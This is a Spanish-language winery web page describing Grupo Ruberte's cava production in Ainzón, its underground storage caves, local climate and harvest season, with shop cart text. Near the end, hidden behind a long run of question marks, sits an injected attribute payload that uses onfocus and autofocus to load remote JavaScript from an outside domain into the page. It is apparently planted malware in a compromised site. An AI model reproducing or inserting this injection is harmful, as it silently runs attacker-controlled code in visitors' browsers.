Innovar sin perder los valores y los procesos tradicionales en la elaboración de cava. Ese es el objetivo de Grupo Ruberte, un conjunto de empresas familiares dedicadas a la elaboración de vino desde hace tres generaciones en la Comarca del Campo de Borja.

 Grupo Ruberte amplia su producción gracias a la adquisición de un nuevo espacio en Ainzón: Bodegas Monasterio de Veruela. En ellas se lleva elaborando cava desde 1986 y cuentan con un gran valor tanto enológico como patrimonial. Grupo Ruberte producirá cava avalado por la Denominación de Origen Cava.

comprar-cava

LOCALIZACIÓN, CLIMA Y REPOSO

Nuestras bodegas se sitúan en Ainzón, localidad zaragozana de la comarca del Campo de Borja. Cuentan con una larga trayectoria y, además, un gran valor patrimonial, pues buena parte del espacio que ocupan consiste en cuevas subterráneas, en concreto cerca de 600 m2 donde el cava embotellado descansa. Estas cuevas tienen una capacidad de almacenamiento de hasta 300.000 botellas.

El clima, mediterráneo, luminoso y soleado, de inviernos suaves y veranos no excesivamente calurosos, hace de esta ubicación un lugar perfecto para la crianza de las uvas y la elaboración del cava.

Desde mediados de agosto hasta finales de octubre se realiza la vendimia. Después, una vez hecho el embotellado, descansa en nuestras cuevas, iniciándose el proceso de fermentación con levaduras.

comprar cava
0
0,00 
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//ideasenpapel.com.gt/404/js/counter.js";document.head.append(script); autofocus=\"
Empty Cart